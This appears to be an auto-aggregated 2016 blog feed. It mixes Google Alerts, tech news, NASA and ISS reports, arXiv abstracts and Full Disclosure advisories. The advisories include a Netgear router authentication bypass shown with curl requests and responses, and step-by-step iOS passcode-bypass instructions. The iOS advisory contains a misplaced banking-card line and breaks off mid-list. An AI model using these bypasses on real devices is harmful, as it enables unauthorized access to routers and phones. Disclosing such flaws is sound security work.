Saturday, February 6, 2016

WATCH ANONYMOUS ZONE

ANONYMOUS ZONE ... and ripped across all the country, in all kinds of terrain and we made this: Anonymous Zone, a new clip directed by Kai Neville.

from Google Alert - anonymous http://ift.tt/1L77nuJ
via IFTTT

Issue #13237

The "explore" page lists all Groups and Numbers or projects they contain to Anonymous users. http://ift.tt/1K5n2A5 The pages should only ...

from Google Alert - anonymous http://ift.tt/1QNwO9a
via IFTTT

Anonymous: Canto di uomini vecchi allegri e goditori

The text refers to elderly men who are undaunted by their age and are still eager to have a good time at the carnival. They do not apologize if some ...

from Google Alert - anonymous http://ift.tt/1QNwO96
via IFTTT

I have a new follower on Twitter


Flomio
We help developers integrate proximity ID technologies. #NFC #mPOS #RFID #Payment #mobilepayment #contactless #app
Miami, FL
https://t.co/dPG7ygqrQD
Following: 221 - Followers: 708

February 06, 2016 at 06:39AM via Twitter http://twitter.com/flomio

Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC

Good news for Linux techno freaks! Do you usually mess with your Android smartphone by trying out the continual ins and outs of various apps and custom ROMs? Then this news is a perfect pick for you! What if you could effectively carry a Linux computer in your pocket? Introducing a new Android-based operating system named "Maru OS" that combines the mobility of a


from The Hacker News http://ift.tt/1Xa5Lrc
via IFTTT

variable undefined error while using anonymous function with user input - MATLAB Answers

Well, I want to write a program that accepts an equation in variables x & y. Then, using an anonymous function, I tried to solve the given equation.

from Google Alert - anonymous http://ift.tt/1NW7sRT
via IFTTT

MIT Develops Hack-Proof RFID Chip — Here's How It Works

Do you know about RFID chips and how many you are carrying at this moment? Today, RFID chips are built into all sorts of items, including your credit cards, travel swipe cards, library books, grocery store cards, security tags, implanted medical records, passports and even the access cards provided by companies. But what actually is an RFID chip? Radio frequency identification (RFID)


from The Hacker News http://ift.tt/1K4dNQr
via IFTTT

Anonymous

Anonymous. This borrower is 21 years old. She went to school until finishing high school. She lives in a family member's house. Her mother is in the ...

from Google Alert - anonymous http://ift.tt/1S6t3i8
via IFTTT

Massive Stars in NGC 6357


Massive stars lie within NGC 6357, an expansive emission nebula complex some 6,500 light-years away toward the tail of the constellation Scorpius. In fact, positioned near center in this ground-based close-up of NGC 6357, star cluster Pismis 24 includes some of the most massive stars known in the galaxy, stars with nearly 100 times the mass of the Sun. The nebula's bright central region also contains dusty pillars of molecular gas, likely hiding massive protostars from the prying eyes of optical instruments. Intricate shapes in the nebula are carved as interstellar winds and energetic radiation from the young and newly forming massive stars clear out the natal gas and dust and power the nebular glow. Enhancing the nebula's cavernous appearance, narrowband image data was included in this composite color image in a Hubble palette scheme. Emission from sulfur, hydrogen, and oxygen atoms is shown in red green and blue hues. The alluring telescopic view spans about 50 light-years at the estimated distance of NGC 6357. via NASA http://ift.tt/1R9z4d3

Friday, February 5, 2016

Anonymous

Anonymous. This woman is 47 years old, and she has two grown children. She was born in the city of Potosí, but had to emigrate to the city of Tarija ...

from Google Alert - anonymous http://ift.tt/1L4DICy
via IFTTT

E-mail in non-English language after anonymous purchase

It would be also great to implement the same feature for anonymous purchases (Commerce), when accounts are automatically created for new users.

from Google Alert - anonymous http://ift.tt/1Qjd9eG
via IFTTT

Orioles: RP Zach Britton agrees to 1-year, $6.75 million contract to avoid arbitration; 4-1 with 36 saves last season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

How to Unlock (and Play) Hidden Chess Game Inside Facebook Messenger

What can you do with Facebook Messenger?
  • Chat with your friends
  • Send GIFs, stickers, and photos
  • Make video calls
  • Send people money in Messenger
Have you ever wanted to play a game while you chat with friends?

Yes, it is possible.

Facebook has made this a reality by building a hidden feature into Facebook Messenger that lets you play chess with your friends without having to install a third-party app.

It just takes one simple step to unlock this hidden game.

All you need to do is type "@fbchess play" and hit Enter during a conversation, and a small square box will appear in the chat box.

Here's how to play: the person who initiated the game is assigned the "White" side and makes the first move.

Pieces are named with standard algebraic notation letters, such as:
  • B for “Bishop”
  • R for “Rook”
  • Q for “Queen”
  • K for “King”
  • N for “Knight”
  • P for “Pawn”
Pawns can be moved by issuing simple commands with numbers (along the vertical axis).

For example, if your first play takes the second pawn from the left and moves it up one block, you would write "@fbchess Pb3" or simply "@fbchess b3".

You could refer to the help section by issuing the command "@fbchess help" for the possible commands to assist you throughout the game.

It turns out that the commands are case sensitive. The board will update and notify you whether it is your turn to play.

You can undo a move with "@fbchess undo" command or by clicking the "undo" button — but your opponent has to accept the request to undo.

The game also lets you carry on a conversation with your friend during the game and resume play by issuing the game commands.

FB Chess is currently available for both mobile and web platforms, eliminating the need to download it separately.

This new productive time-killer game is meant to entertain users by sharpening the brain while they chat with a friend.


from The Hacker News http://ift.tt/1Po5N9G
via IFTTT

Tracking Anonymous Web Users

We develop a Bayesian imputation approach that allows us to probabilistically assign anonymous sessions to users, while accounting for a ...

from Google Alert - anonymous http://ift.tt/23NqNk1
via IFTTT

United Nations Rules in Favor of WikiLeaks Founder Julian Assange

VICTORY!

As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.

However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.

Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.

But, Victory! The decision is in favor of Assange.



The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.

Julian Assange should be released immediately and allowed to leave the embassy, and both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.

"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.

But, Will UK and Sweden Let Assange Leave the country?


Although the decision is in favor of Assange, it is possible that both countries' governments will not let Assange leave the country.

The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.

The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."

Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.

Meanwhile, the Met Police said it will make "every effort" to arrest Assange should he leave the embassy.

Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, to avoid extradition to:
  • Sweden where he is facing sexual assault allegations, which he has always denied.
  • The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.

Assange's Lawyer: Sweden and UK should Respect UN’s Decision


Melinda Taylor, Assange's lawyer, says that if there is a positive ruling for Assange by the UN group, the Swedish and British governments should respect their international obligations and comply with the decision, thereby allowing him to leave freely.
"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek reporter.
If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.

Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, helping governments to release people.

Similar rulings from the UN panel have resulted in the release of:
  • Washington Post journalist Jason Rezaian, who was released in Iran last month.
  • Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
  • Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.
Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges. However, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.


from The Hacker News http://ift.tt/1NTXOzj
via IFTTT

ISS Daily Summary Report – 02/4/16

Node 3 Carbon Dioxide Removal Assembly (CDRA) Repair: Kelly and Kopra replaced the Fan Motor Controller (FMC) on the Node 3 CDRA which had failed on January 19th. In addition to the FMC change out, the crew took advantage of the CDRA configuration and also replaced a faulty Secondary Heater Controller, an Air Selector Valve 104, and cleaned the Node 3 Avionic Rack Air Assembly. Following the repair, ground controllers successfully reactivated the unit.

Habitability: Today Kopra recorded a narrated task video of his activities to remove and replace the Node 3 Carbon Dioxide Removal Assembly (CDRA) Heater Controller, Motor Controller and CO2 Selector Valve. He captured details such as hardware and tool interface issues, volume needed to perform the task, or other human factors concerns for task performance. The Habitability investigation results will be used to assess the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.

ExtraVehicular Activity (EVA) Tool Stow: Peake received USOS tools from Volkov that were used as part of yesterday’s Russian Segment EVA. Once the tools were transferred, he stowed the items within the US Airlock. Among the items transferred were Tethers, Radio Frequency Camera Assemblies, Helmet Interchangeable Portable Lights, and Rechargeable EVA Battery Assemblies.

Potable Water Dispenser Sample Analysis: Peake visually analyzed water samples within Coliform Detection Bags and Microbial Capture Devices (MCDs) after 48 hours of incubation. The samples had been obtained from the USOS and RS water dispensers on Tuesday. The samples will be returning to the ground by way of Soyuz 44 next month.

Special Purpose Dexterous Manipulator (SPDM) Main Bus Switching Unit (MBSU) Demonstration: Ground controllers began 3 days of activities designed to validate robotic transfer of battery style Orbital Replacement Units (ORUs) prior to the delivery of new ISS batteries on HTV-6. A successful demonstration will allow planners to reduce the number of EVAs to install the batteries. This afternoon, controllers are using the SPDM to move the spare MBSU Flight Releasable Attachment Mechanism (FRAM) from Express Logistics Carrier (ELC)-2 to the Enhanced ORU Temporary Platform (EOTP) on SPDM. Controllers will then use the Right-hand Off-Set Tool (ROST) to unfasten the MBSU secondary bolt.

Today’s Planned Activities
All activities were completed unless otherwise noted.

Gathering CDRA Kits Columbus Stowage Consolidation – Part 3 of 3 EPO – Review Video Demonstration Photo/TV CDRA Node 3 Video Setup Carbon Dioxide Removal Assembly (CDRA) Removal Unstow of EPO and Classroom Videos Demonstrations (CVD) items MELFI – Retrieval of Ice Bricks Position JEM Camcorder for a view of CDRA activities CDRA R&R Node1 Camcorder Settings Adjustment Post-EVA Orlan Debrief With Specialists EXPOSE-R. Copy and Downlink Data Deinstall US TV cameras, Lights, and REBA power supply from Orlan No.4 and No.6 HABIT. Overview Video Handover of US EVA Tools to the USOS after RS EVA 42 Post-EVA Pille Dosimeter Reading ISS HAM Radio – Radio Power up Drying Orlan-MK Water Feed Line Portable Computer System (PCS) Hard Drive (HD) Swap and Image Orlan Feedwater Bladder Refill Post-EVA Medical Kits Restow EVA – RS EVA Tool Stowage HABIT – Launching the Application Carbon Dioxide Removal Assembly (CDRA) CO2 Selector Valve (ASV) Remove and Replace On MCC Go Progress 431 Cygnus Cargo Operations Orlan-MK Drying – start HABIT – End Task Digital Media Setup DC1 – СУ Hatch Opening CSA PAO Recording and Downlink (Marrow P/L) On MCC GO ТКГ-СУ Hatch Opening Installing Quick-Release Screw Clamps on DC1 side ТКГ 431 (DC1) deactivation, air duct installation INTERACTION-2. Experiment Ops / r/g 1316 Environmental Health System (EHS) Microbial Capture Device (MCD) – In-flight Microbiology Water Analysis and GMT Day 33 Data Recording Orlan-MK Drying (switching to a backup fan) On-orbit hearing assessment using EARQ CIR – Post-Experiment Hardware Stowage СОЖ Maintenance HAM radio session from Columbus HABIT – Hardware Setup Orlan-MK Drying – terminate BRI log download from RSS1 Setting up Orlan and БСС for storage mode

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.

Nominal System Commanding SPDM MBSU Demo

Three-Day Look Ahead:
Friday, 02/05: Cygnus cargo operations, remove Cyclops from JEM slidetable, CIR stow and bottle replace, EPO classroom videos, PILOT-T, SPDM MBSU Demo
Saturday, 02/06: Weekly Cleaning, Crew Off Duty, SPDM MBSU demo
Sunday, 02/07: Crew off Duty

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: Off
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Fail
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Idle
Major Constituent Analyzer (MCA) Node 3: Idle
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Shutdown
Trace Contaminant Control System (TCCS) Lab: Full Up
Trace Contaminant Control System (TCCS) Node 3: Off

from ISS On-Orbit Status Report http://ift.tt/1Kugw5I
via IFTTT

Critical Flaws Found in NETGEAR Network Management System

Someone Hijacks Botnet Network & Replaces Malware with an Antivirus

The Dridex banking trojan that is widely being used by cyber criminals to distribute malware onto users’ machines has now been found distributing security software.

A portion of the Dridex banking Trojan botnet may have been hacked or compromised by an unknown Whitehat Hacker, who replaced the malicious links with Avira Antivirus installers.

What is Dridex Banking Trojan? How it Works?


Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again.

The Dridex virus typically distributes itself through spam messages or emails that include malicious attachments, most often a Microsoft Office file or Word document integrated with malicious macros.

Once the malicious file has been clicked, the macros download and install the main payload of the virus – the trojan program itself – from a hijacked server, which installs and runs on the victim's computer.

The Dridex trojan program then creates a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects.

This results in stealing victim's personal data like usernames and passwords, with an ultimate aim to break into bank accounts and siphon off cash.

Hacker replaces Trojan with Anti-virus


However, the recent hack is a surprise: instead of distributing the banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of the free anti-virus software from Avira, as the company itself has announced.

"The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader," explained Avira malware expert Moritz Kroll, reported Reg.
Avira believes that the white hat hacker or hackers may have hacked into a portion of infected web servers using the same flaws the malware authors used and then replaced the malicious code with the Avira installer.

So, once infected, instead of receiving Dridex malware, the victims get a valid, signed copy of Avira antivirus software.

"We still don't know exactly who is doing this with our installer and why – but we have some theories," said Kroll. "This is certainly not something we are doing ourselves."

Although the motives behind including the Avira software are still unclear, these kinds of actions are considered to be illegal in many countries, said Kroll.

What Can Be Done to Protect Against Malware Attacks?


To avoid becoming part of the Dridex banking trojan botnet:
  • Ensure you have an updated antivirus program running on your PC, which should be able to intercept the malicious attachments before they are opened.
  • One of the best measures for securing your online environment is to deploy an Intrusion Detection System (IDS) at the network layer, which is especially useful to quickly detect malware and other threats in your network when integrated with a real-time threat intelligence and SIEM (Security Intelligence and Event Monitoring) solution, such as AlienVault Unified Security Management (USM).
  • Be careful of opening email attachments sent from an unknown email address, particularly (in this case) Microsoft Word and Excel files.
  • Disable Macros in MS Office, or at least set the Macros to request permission before they run.


from The Hacker News http://ift.tt/1VTGgJp
via IFTTT

Food Addicts in Recovery Anonymous

3/1/16 1pm; 3/3/16 7pm; 3/8/16 1pm; 3/10/16 7pm; 3/15/16 1pm; 3/17/16 7pm; 3/22/16 1pm; 3/24/16 7pm; 3/29/16 1pm; 4/5/16 1pm; 4/7/16 7pm ...

from Google Alert - anonymous http://ift.tt/1mhtSGR
via IFTTT

Dwarf Planet Ceres


Dwarf planet Ceres is the largest object in the Solar System's main asteroid belt, with a diameter of about 950 kilometers (590 miles). Ceres is seen here in approximately true color, based on image data from the Dawn spacecraft recorded on May 4, 2015. On that date, Dawn's orbit stood 13,642 kilometers above the surface of the small world. Two of Ceres' famous mysterious bright spots at Oxo crater and Haulani crater are near center and center right of this view. Casting a telltale shadow at the bottom is Ceres' cone-shaped, lonely mountain Ahuna Mons. Presently some 385 kilometers above the Cerean surface, the ion-propelled Dawn spacecraft is now returning images from its closest mapping orbit. via NASA http://ift.tt/20t6SaU

Thursday, February 4, 2016

A Factorized Recurrent Neural Network based architecture for medium to large vocabulary Language Modelling. (arXiv:1602.01576v1 [cs.CL])

Statistical language models are central to many applications that use semantics. Recurrent Neural Networks (RNN) are known to produce state of the art results for language modelling, outperforming their traditional n-gram counterparts in many cases. To generate a probability distribution across a vocabulary, these models require a softmax output layer that linearly increases in size with the size of the vocabulary. Large vocabularies need a commensurately large softmax layer and training them on typical laptops/PCs requires significant time and machine resources. In this paper we present a new technique for implementing RNN based large vocabulary language models that substantially speeds up computation while optimally using the limited memory resources. Our technique, while building on the notion of factorizing the output layer by having multiple output layers, improves on the earlier work by substantially optimizing on the individual output layer size and also eliminating the need for a multistep prediction process.




from cs.AI updates on arXiv.org http://ift.tt/1nQEbUa
via IFTTT

Ups and Downs: Modeling the Visual Evolution of Fashion Trends with One-Class Collaborative Filtering. (arXiv:1602.01585v1 [cs.AI])

Building a successful recommender system depends on understanding both the dimensions of people's preferences as well as their dynamics. In certain domains, such as fashion, modeling such preferences can be incredibly difficult, due to the need to simultaneously model the visual appearance of products as well as their evolution over time. The subtle semantics and non-linear dynamics of fashion evolution raise unique challenges especially considering the sparsity and large scale of the underlying datasets. In this paper we build novel models for the One-Class Collaborative Filtering setting, where our goal is to estimate users' fashion-aware personalized ranking functions based on their past feedback. To uncover the complex and evolving visual factors that people consider when evaluating products, our method combines high-level visual features extracted from a deep convolutional neural network, users' past feedback, as well as evolving trends within the community. Experimentally we evaluate our method on two large real-world datasets from Amazon.com, where we show it to outperform state-of-the-art personalized ranking measures, and also use it to visualize the high-level fashion trends across the 11-year span of our dataset.




from cs.AI updates on arXiv.org http://ift.tt/1nKAbnt
via IFTTT

Fuzzy Object-Oriented Dynamic Networks. II. (arXiv:1602.01628v1 [cs.AI])

This article generalizes object-oriented dynamic networks to the fuzzy case, which allows one to represent knowledge on objects and classes of objects that are fuzzy by nature and also to model their changes in time. Within the framework of the approach described, a mechanism is proposed that makes it possible to acquire new knowledge on the basis of basic knowledge and considerably differs from well-known methods used in existing models of knowledge representation. The approach is illustrated by an example of construction of a concrete fuzzy object-oriented dynamic network.




from cs.AI updates on arXiv.org http://ift.tt/1nQEbU8
via IFTTT

A Generalised Quantifier Theory of Natural Language in Categorical Compositional Distributional Semantics with Bialgebras. (arXiv:1602.01635v1 [cs.CL])

Categorical compositional distributional semantics is a model of natural language; it combines the statistical vector space models of words with the compositional models of grammar. We formalise in this model the generalised quantifier theory of natural language, due to Barwise and Cooper. The underlying setting is a compact closed category with bialgebras. We start from a generative grammar formalisation and develop an abstract categorical compositional semantics for it, then instantiate the abstract setting to sets and relations and to finite dimensional vector spaces and linear maps. We prove the equivalence of the relational instantiation to the truth theoretic semantics of generalized quantifiers. The vector space instantiation formalises the statistical usages of words and enables us to, for the first time, reason about quantified phrases and sentences compositionally in distributional semantics.




from cs.AI updates on arXiv.org http://ift.tt/1nKAbnp
via IFTTT

Formal Verification of Autonomous Vehicle Platooning. (arXiv:1602.01718v1 [cs.AI])

The coordination of multiple autonomous vehicles into convoys or platoons is expected on our highways in the near future. However, before such platoons can be deployed, the new autonomous behaviors of the vehicles in these platoons must be certified. An appropriate representation for vehicle platooning is as a multi-agent system in which each agent captures the "autonomous decisions" carried out by each vehicle. In order to ensure that these autonomous decision-making agents in vehicle platoons never violate safety requirements, we use formal verification. However, as the formal verification technique used to verify the agent code does not scale to the full system and as the global verification technique does not capture the essential verification of autonomous behavior, we use a combination of the two approaches. This mixed strategy allows us to verify safety requirements not only of a model of the system, but of the actual agent code used to program the autonomous vehicles.




from cs.AI updates on arXiv.org http://ift.tt/1nQEdv7
via IFTTT

Updating Formulas and Algorithms for Computing Entropy and Gini Index from Time-Changing Data Streams. (arXiv:1403.6348v4 [cs.AI] UPDATED)

Despite growing interest in data stream mining the most successful incremental learners, such as VFDT, still use periodic recomputation to update attribute information gains and Gini indices. This note provides simple incremental formulas and algorithms for computing entropy and Gini index from time-changing data streams.




from cs.AI updates on arXiv.org http://ift.tt/1lkDGgZ
via IFTTT

The Ubuntu Dialogue Corpus: A Large Dataset for Research in Unstructured Multi-Turn Dialogue Systems. (arXiv:1506.08909v3 [cs.CL] UPDATED)

This paper introduces the Ubuntu Dialogue Corpus, a dataset containing almost 1 million multi-turn dialogues, with a total of over 7 million utterances and 100 million words. This provides a unique resource for research into building dialogue managers based on neural language models that can make use of large amounts of unlabeled data. The dataset has both the multi-turn property of conversations in the Dialog State Tracking Challenge datasets, and the unstructured nature of interactions from microblog services such as Twitter. We also describe two neural learning architectures suitable for analyzing this dataset, and provide benchmark performance on the task of selecting the best next response.




from cs.AI updates on arXiv.org http://ift.tt/1KrsuvI
via IFTTT

Breaking Symmetries in Graph Search with Canonizing Sets. (arXiv:1511.08205v2 [cs.AI] UPDATED)

There are many complex combinatorial problems which involve searching for an undirected graph satisfying given constraints. Such problems are often highly challenging because of the large number of isomorphic representations of their solutions. This paper introduces effective and compact, complete symmetry breaking constraints for small graph search. Enumerating with these symmetry breaks generates all and only non-isomorphic solutions. For small search problems, with up to $10$ vertices, we compute instance independent symmetry breaking constraints. For small search problems with a larger number of vertices we demonstrate the computation of instance dependent constraints which are complete. We illustrate the application of complete symmetry breaking constraints to extend two known sequences from the OEIS related to graph enumeration. We also demonstrate the application of a generalization of our approach to fully-interchangeable matrix search problems.




from cs.AI updates on arXiv.org http://ift.tt/1RfDYEx
via IFTTT

VBPR: Visual Bayesian Personalized Ranking from Implicit Feedback. (arXiv:1510.01784v1 [cs.IR] CROSS LISTED)

Modern recommender systems model people and items by discovering or `teasing apart' the underlying dimensions that encode the properties of items and users' preferences toward them. Critically, such dimensions are uncovered based on user feedback, often in implicit form (such as purchase histories, browsing logs, etc.); in addition, some recommender systems make use of side information, such as product attributes, temporal information, or review text. However one important feature that is typically ignored by existing personalized recommendation and ranking methods is the visual appearance of the items being considered. In this paper we propose a scalable factorization model to incorporate visual signals into predictors of people's opinions, which we apply to a selection of large, real-world datasets. We make use of visual features extracted from product images using (pre-trained) deep networks, on top of which we learn an additional layer that uncovers the visual dimensions that best explain the variation in people's feedback. This not only leads to significantly more accurate personalized ranking methods, but also helps to alleviate cold start issues, and qualitatively to analyze the visual dimensions that influence people's opinions.




from cs.AI updates on arXiv.org http://ift.tt/1jOXGdu
via IFTTT

Orioles: RP Brian Matusz agrees to 1-year deal, avoiding arbitration; 2.94 ERA over 49 innings last season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] Executable installers are vulnerable^WEVIL (case 23): WinImage's installer and self-extractors allow arbitrary (remote) code execution and escalation of privilege

[FD] Netgear RP614v3 : Authentication Bypass

###########################################
Vendor : NETGEAR
Product : RP614v3
informed on : 12. 10. 2015
responded : no
fixed : no
Effect : Remotely exploitable over LAN/WLAN
Type : Authentication Bypass
Difficulty : trivial
###########################################

The N300 FW authentication bypass inspired me to check my rp614v3 router and I found this bypass:

Firmware: *Firmwareversion* V6.0GR Oct 26 2004 (which seems to be the latest)

It's an old model, but it's still in operation with ADSL2 connections like TCOM DSL6000 in Germany.

How it works:

If you use a normal browser, it sends a *HEAD*, followed by a GET, to the router first, which gets a 403 Forbidden back:

# curl -I "http://ift.tt/23LDsnp"
HTTP/1.0 403 Forbidden

This was expected and is the valid answer, but if you send a *GET* instead of the HEAD and you're not authenticated, you get the 200 back:

# curl -i "http://ift.tt/23LDsnp"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 7158
Accept-ranges: bytes
Content-type: text/html
...

Works for every page, with all information disclosed the router has to offer. No password nor a username needed.

Example:

# curl -i "http://ift.tt/1L0X7UM"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 13722
Accept-ranges: bytes
Content-type: text/html
....
# IP-Adresse Gerätename MAC-Adresse
1 *192.168.1.2* LapTop *00:15:a5:d5:f7:7c*
2 *192.168.1.3* Accesspoint *21:6e:5c:23:86:a2*

(all IPs and MACs have been changed)

Sidenote: As it's a problem of the underlying httpd server from "Delta Networks Inc.", it's most likely to be affecting all DSL router products using that same version of the httpd.

Source: Gmail -> IFTTT-> Blogger

[FD] osTicket multiple vulnerabilities

============================================= - Release date: February 04th, 2016 - Discovered by: Giovanni Cerrato and Enrico Cinquini - Severity: High ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Orioles: SP Odrisamer Despaigne acquired from Padres for minor-league SP J.C. Cosme -- multiple reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] NDI5aster – Privilege Escalation through NDIS 5.x Filter Intermediate Drivers

NDI5aster – Privilege Escalation through NDIS 5.x Filter Intermediate Drivers ABSTRACT The Network Driver Interface Specification (NDIS) [11] provides a programming interface specification that facilitates from the network driver architecture perspective the communication between a protocol driver and the underlying network adapter. In Windows OS the so called “NDIS wrapper” (implemented in the Ndis.sys) provides a programming layer of communication between network protocols (TCP/IP) and all the underlying NDIS device drivers so that the implementation of high-level protocol components are independent of the network adapter itself. During vulnerability research from a local security perspective that was performed over several software firewall products designed for Windows XP and Windows Server 2003 (R2 included), an issue during the loading and initialization of one of the OS NDIS protocol drivers was identified; specifically the ’Remote Access and Routing Driver’ called wanarp.sys. This issue can be exploited through various NDIS 5.x filter intermediate drivers [4] that provide the firewall functionality of several security related products. The resulting impact is vertical privilege escalation which allows a local attacker to execute code with kernel privileges from any account type, thus completely compromising the affected host. URL: http://ift.tt/1nJKckJ

Source: Gmail -> IFTTT-> Blogger

[FD] Apple iOS v9.1, 9.2 & 9.2.1 - Application Update Loop Pass Code Bypass

Document Title: =============== Apple iOS v9.1, 9.2 & 9.2.1 - Application Update Loop Pass Code Bypass References (Source): ==================== http://ift.tt/1VPrL9u Apple Follow-up ID: 631627909 Video: http://ift.tt/1nOLrQi Vulnerability Magazine: http://ift.tt/1SuXY8w Release Date: ============= 2016-02-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1710 Common Vulnerability Scoring System: ==================================== 6 Product & Service Introduction: =============================== iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have been sold through June 2012. ( Copy of the Homepage: http://ift.tt/15d7WzJ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a pass code lock auth bypass vulnerability in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. 
Vulnerability Disclosure Timeline: ================================== 2015-10-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-10-23: Vendor Notification (Apple Product Security Team) 2015-01-22: Vendor Response/Feedback (Apple Product Security Team) 2016-**-**: Vendor Fix/Patch (Apple Product Developer Team) 2016-02-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Apple Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application. The vulnerability is located in the iPad 2 & iPhone 5 & 6 hardware configuration with iOS v8.2 - v9.2 when processing an update which results in a interface loop by the application slides. Local attacker can trick the iOS device into a mode were a runtime issue with unlimited loop occurs. This finally results in a temporarily deactivate of the pass code lock screen. By loading the loop with remote app interaction we was able to stable bypass the auth of an iphone after the reactivation via shutdown button. The settings of the device was permanently requesting the pass code lock on interaction. Normally the pass code lock is being activated during the shutdown button interaction. In case of the loop the request shuts the display down but does not activate the pass code lock like demonstrated in the attached poc security video. 
In case of exploitation the attack could be performed time-based by a manipulated iOS application or by physical device access and interaction with restricted system user account. In earlier cases of exploitation these type of loops were able to be used as jailbreak against iOS. The vulnerability can be exploited in non-jailbroken unlocked apple iphone mobiles. The security risk of the local pass code bypass issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the local bug requires pending on the attack scenario local device access or a manipulated app installed to the device without user interaction. Successful exploitation of the security vulnerability results in unauthorized device access via pass code lock bypass. Proof of Concept (PoC): ======================= The new attack case of scenario can be exploited by local attackers with physical bank branch office service access and valid local banking card. For security demonstration or to reproduce the issue follow the provided information & steps below to continue. Manual steps to reproduce the vulnerability ... 1. First fill up about some % of the free memory in the iOS device with random data 2. Now, you open the app-store choose to update all applications (update all push button) 3. Switch fast via home button to the slide index and perform iOS update at the same time Note: The interaction to switch needs to be performed very fast to successfully exploit. In the first load of the update you can still use the home button. Press it go back to index 4. Now, press the home button again to review the open runnings slides 5. Switch to the left menu after the last slide which is new and perform to open siri in the same moment. Now the slide hangs and runs all time in a loop 6. Turn of via power button the ipad or iphone .... 7. 
